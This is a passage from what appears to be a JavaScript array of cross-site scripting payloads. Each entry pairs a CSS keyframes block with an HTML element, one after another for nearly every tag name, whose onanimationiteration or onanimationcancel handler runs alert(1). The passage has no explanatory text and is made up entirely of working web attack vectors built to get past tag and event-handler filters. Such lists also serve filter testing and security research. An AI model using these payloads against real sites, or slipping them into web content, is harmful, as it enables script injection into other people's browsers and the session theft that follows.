onanimationiteration="alert(1)"></bdo>' +xss,'<style>@keyframes slidein {}</style><bgsound style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></bgsound>' +xss,'<style>@keyframes slidein {}</style><big style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></big>' +xss,'<style>@keyframes slidein {}</style><blink style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blink>' +xss,'<style>@keyframes slidein {}</style><blockquote style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></blockquote>' +xss,'<style>@keyframes slidein {}</style><body style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></body>' +xss,'<style>@keyframes slidein {}</style><br style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></br>' +xss,'<style>@keyframes slidein {}</style><button style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></button>' +xss,'<style>@keyframes slidein {}</style><canvas style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></canvas>' +xss,'<style>@keyframes slidein {}</style><caption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></caption>' +xss,'<style>@keyframes slidein {}</style><center style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></center>' +xss,'<style>@keyframes slidein {}</style><cite style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></cite>' +xss,'<style>@keyframes slidein {}</style><code style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></code>' +xss,'<style>@keyframes slidein {}</style><col style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></col>' +xss,'<style>@keyframes slidein {}</style><colgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></colgroup>' +xss,'<style>@keyframes slidein {}</style><command style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></command>' +xss,'<style>@keyframes slidein {}</style><content style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></content>' +xss,'<style>@keyframes slidein {}</style><data style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></data>' +xss,'<style>@keyframes slidein {}</style><datalist style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></datalist>' +xss,'<style>@keyframes slidein {}</style><dd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dd>' +xss,'<style>@keyframes slidein {}</style><del style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></del>' +xss,'<style>@keyframes slidein {}</style><details style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></details>' +xss,'<style>@keyframes slidein {}</style><dfn style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dfn>' +xss,'<style>@keyframes slidein {}</style><dialog style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dialog>' +xss,'<style>@keyframes slidein {}</style><dir style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dir>' +xss,'<style>@keyframes slidein {}</style><div style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></div>' +xss,'<style>@keyframes slidein {}</style><dl style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dl>' +xss,'<style>@keyframes slidein {}</style><dt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></dt>' +xss,'<style>@keyframes slidein {}</style><element style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></element>' +xss,'<style>@keyframes slidein {}</style><em style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></em>' +xss,'<style>@keyframes slidein {}</style><embed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></embed>' +xss,'<style>@keyframes slidein {}</style><fieldset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></fieldset>' +xss,'<style>@keyframes slidein {}</style><figcaption style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figcaption>' +xss,'<style>@keyframes slidein {}</style><figure style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></figure>' +xss,'<style>@keyframes slidein {}</style><font style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></font>' +xss,'<style>@keyframes slidein {}</style><footer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></footer>' +xss,'<style>@keyframes slidein {}</style><form style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></form>' +xss,'<style>@keyframes slidein {}</style><frame style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frame>' +xss,'<style>@keyframes slidein {}</style><frameset style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></frameset>' +xss,'<style>@keyframes slidein {}</style><h1 style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></h1>' +xss,'<style>@keyframes slidein {}</style><head style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></head>' +xss,'<style>@keyframes slidein {}</style><header style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></header>' +xss,'<style>@keyframes slidein {}</style><hgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hgroup>' +xss,'<style>@keyframes slidein {}</style><hr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></hr>' +xss,'<style>@keyframes slidein {}</style><html style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></html>' +xss,'<style>@keyframes slidein {}</style><i style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></i>' +xss,'<style>@keyframes slidein {}</style><iframe style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></iframe>' +xss,'<style>@keyframes slidein {}</style><image style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></image>' +xss,'<style>@keyframes slidein {}</style><img style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></img>' +xss,'<style>@keyframes slidein {}</style><input style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></input>' +xss,'<style>@keyframes slidein {}</style><ins style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ins>' +xss,'<style>@keyframes slidein {}</style><isindex style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></isindex>' +xss,'<style>@keyframes slidein {}</style><kbd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></kbd>' +xss,'<style>@keyframes slidein {}</style><keygen style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></keygen>' +xss,'<style>@keyframes slidein {}</style><label style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></label>' +xss,'<style>@keyframes slidein {}</style><legend style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></legend>' +xss,'<style>@keyframes slidein {}</style><li style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></li>' +xss,'<style>@keyframes slidein {}</style><link style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></link>' +xss,'<style>@keyframes slidein {}</style><listing style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></listing>' +xss,'<style>@keyframes slidein {}</style><main style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></main>' +xss,'<style>@keyframes slidein {}</style><map style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></map>' +xss,'<style>@keyframes slidein {}</style><mark style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></mark>' +xss,'<style>@keyframes slidein {}</style><marquee style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></marquee>' +xss,'<style>@keyframes slidein {}</style><menu style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menu>' +xss,'<style>@keyframes slidein {}</style><menuitem style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menuitem>' +xss,'<style>@keyframes slidein {}</style><meta style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meta>' +xss,'<style>@keyframes slidein {}</style><meter style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meter>' +xss,'<style>@keyframes slidein {}</style><multicol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></multicol>' +xss,'<style>@keyframes slidein {}</style><nav style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nav>' +xss,'<style>@keyframes slidein {}</style><nextid style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nextid>' +xss,'<style>@keyframes slidein {}</style><nobr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nobr>' +xss,'<style>@keyframes slidein {}</style><noembed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noembed>' +xss,'<style>@keyframes slidein {}</style><noframes style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noframes>' +xss,'<style>@keyframes slidein {}</style><noscript style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noscript>' +xss,'<style>@keyframes slidein {}</style><object style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></object>' +xss,'<style>@keyframes slidein {}</style><ol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ol>' +xss,'<style>@keyframes slidein {}</style><optgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></optgroup>' +xss,'<style>@keyframes slidein {}</style><option style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></option>' +xss,'<style>@keyframes slidein {}</style><output style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></output>' +xss,'<style>@keyframes slidein {}</style><p style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></p>' +xss,'<style>@keyframes slidein {}</style><param style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></param>' +xss,'<style>@keyframes slidein {}</style><picture style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></picture>' +xss,'<style>@keyframes slidein {}</style><plaintext style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></plaintext>' +xss,'<style>@keyframes slidein {}</style><pre style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></pre>' +xss,'<style>@keyframes slidein {}</style><progress style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></progress>' +xss,'<style>@keyframes slidein {}</style><q style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></q>' +xss,'<style>@keyframes slidein {}</style><rb style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rb>' +xss,'<style>@keyframes slidein {}</style><rp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rp>' +xss,'<style>@keyframes slidein {}</style><rt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rt>' +xss,'<style>@keyframes slidein {}</style><rtc style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rtc>' +xss,'<style>@keyframes slidein {}</style><ruby style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ruby>' +xss,'<style>@keyframes slidein {}</style><s style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></s>' +xss,'<style>@keyframes slidein {}</style><samp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></samp>' +xss,'<style>@keyframes slidein {}</style><script style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></script>' +xss,'<style>@keyframes slidein {}</style><section style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></section>' +xss,'<style>@keyframes slidein {}</style><select style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></select>' +xss,'<style>@keyframes slidein {}</style><shadow style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></shadow>' +xss,'<style>@keyframes slidein {}</style><slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></slot>' +xss,'<style>@keyframes slidein {}</style><small style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></small>' +xss,'<style>@keyframes slidein {}</style><source style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></source>' +xss,'<style>@keyframes slidein {}</style><spacer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></spacer>' +xss,'<style>@keyframes slidein {}</style><span style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></span>' +xss,'<style>@keyframes slidein {}</style><strike style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strike>' +xss,'<style>@keyframes slidein {}</style><strong style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strong>' +xss,'<style>@keyframes slidein {}</style><style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></style>' +xss,'<style>@keyframes slidein {}</style><sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sub>' +xss,'<style>@keyframes slidein {}</style><summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></summary>' +xss,'<style>@keyframes slidein {}</style><sup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sup>' +xss,'<style>@keyframes slidein {}</style><svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></svg>' +xss,'<style>@keyframes slidein {}</style><table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></table>' +xss,'<style>@keyframes slidein {}</style><tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tbody>' +xss,'<style>@keyframes slidein {}</style><td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></td>' +xss,'<style>@keyframes slidein {}</style><template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></template>' +xss,'<style>@keyframes slidein {}</style><textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></textarea>' +xss,'<style>@keyframes slidein {}</style><tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tfoot>' +xss,'<style>@keyframes slidein {}</style><th style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></th>' +xss,'<style>@keyframes slidein {}</style><thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></thead>' +xss,'<style>@keyframes slidein {}</style><time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></time>' +xss,'<style>@keyframes slidein {}</style><title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></title>' +xss,'<style>@keyframes slidein {}</style><tr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tr>' +xss,'<style>@keyframes slidein {}</style><track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></track>' +xss,'<style>@keyframes slidein {}</style><tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tt>' +xss,'<style>@keyframes slidein {}</style><u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></u>' +xss,'<style>@keyframes slidein {}</style><ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ul>' +xss,'<style>@keyframes slidein {}</style><var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></var>' +xss,'<style>@keyframes slidein {}</style><video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></video>' +xss,'<style>@keyframes slidein {}</style><wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></wbr>' +xss,'<style>@keyframes slidein {}</style><xmp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xmp>' +xss,'<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style="position:absolute;" onanimationcancel="alert(1)"></abbr>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style="position:absolute;" onanimationcancel="alert(1)"></acronym>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style="position:absolute;" onanimationcancel="alert(1)"></address>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style="position:absolute;" onanimationcancel="alert(1)"></applet>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style="position:absolute;" onanimationcancel="alert(1)"></area>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style="position:absolute;" onanimationcancel="alert(1)"></article>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><aside id=x style="position:absolute;" onanimationcancel="alert(1)"></aside>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style="position:absolute;" onanimationcancel="alert(1)"></audio>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><b id=x style="position:absolute;" onanimationcancel="alert(1)"></b>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style="position:absolute;" onanimationcancel="alert(1)"></base>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style="position:absolute;" onanimationcancel="alert(1)"></basefont>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdi id=x style="position:absolute;" onanimationcancel="alert(1)"></bdi>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style="position:absolute;" onanimationcancel="alert(1)"></bdo>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"></bgsound>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style="position:absolute;" onanimationcancel="alert(1)"></blink>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"></blockquote>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style="position:absolute;" onanimationcancel="alert(1)"></body>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style="position:absolute;" onanimationcancel="alert(1)"></br>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style="position:absolute;" onanimationcancel="alert(1)"></button>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style="position:absolute;" onanimationcancel="alert(1)"></canvas>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style="position:absolute;" onanimationcancel="alert(1)"></caption>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style="position:absolute;" onanimationcancel="alert(1)"></center>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style="position:absolute;" onanimationcancel="alert(1)"></cite>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style="position:absolute;" onanimationcancel="alert(1)"></code>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style="position:absolute;" onanimationcancel="alert(1)"></col>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><colgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></colgroup>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style="position:absolute;" onanimationcancel="alert(1)"></command>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style="position:absolute;" onanimationcancel="alert(1)"></content>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style="position:absolute;" onanimationcancel="alert(1)"></data>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style="position:absolute;" onanimationcancel="alert(1)"></datalist>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dd id=x style="position:absolute;" onanimationcancel="alert(1)"></dd>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><del id=x style="position:absolute;" onanimationcancel="alert(1)"></del>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style="position:absolute;" onanimationcancel="alert(1)"></details>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style="position:absolute;" onanimationcancel="alert(1)"></dfn>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style="position:absolute;" onanimationcancel="alert(1)"></dialog>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style="position:absolute;" onanimationcancel="alert(1)"></dir>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style="position:absolute;" onanimationcancel="alert(1)"></div>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style="position:absolute;" onanimationcancel="alert(1)"></dl>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style="position:absolute;" onanimationcancel="alert(1)"></dt>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style="position:absolute;" onanimationcancel="alert(1)"></element>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style="position:absolute;" onanimationcancel="alert(1)"></em>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style="position:absolute;" onanimationcancel="alert(1)"></embed>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"></fieldset>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"></figcaption>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style="position:absolute;" onanimationcancel="alert(1)"></figure>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><font id=x style="position:absolute;" onanimationcancel="alert(1)"></font>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style="position:absolute;" onanimationcancel="alert(1)"></footer>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style="position:absolute;" onanimationcancel="alert(1)"></form>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style="position:absolute;" onanimationcancel="alert(1)"></frame>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style="position:absolute;" onanimationcancel="alert(1)"></frameset>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style="position:absolute;" onanimationcancel="alert(1)"></h1>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><head id=x style="position:absolute;" onanimationcancel="alert(1)"></head>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style="position:absolute;" onanimationcancel="alert(1)"></header>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></hgroup>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hr id=x style="position:absolute;" onanimationcancel="alert(1)"></hr>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style="position:absolute;" onanimationcancel="alert(1)"></html>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style="position:absolute;" onanimationcancel="alert(1)"></i>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style="position:absolute;" onanimationcancel="alert(1)"></iframe>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style="position:absolute;" onanimationcancel="alert(1)"></image>' +xss,'<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 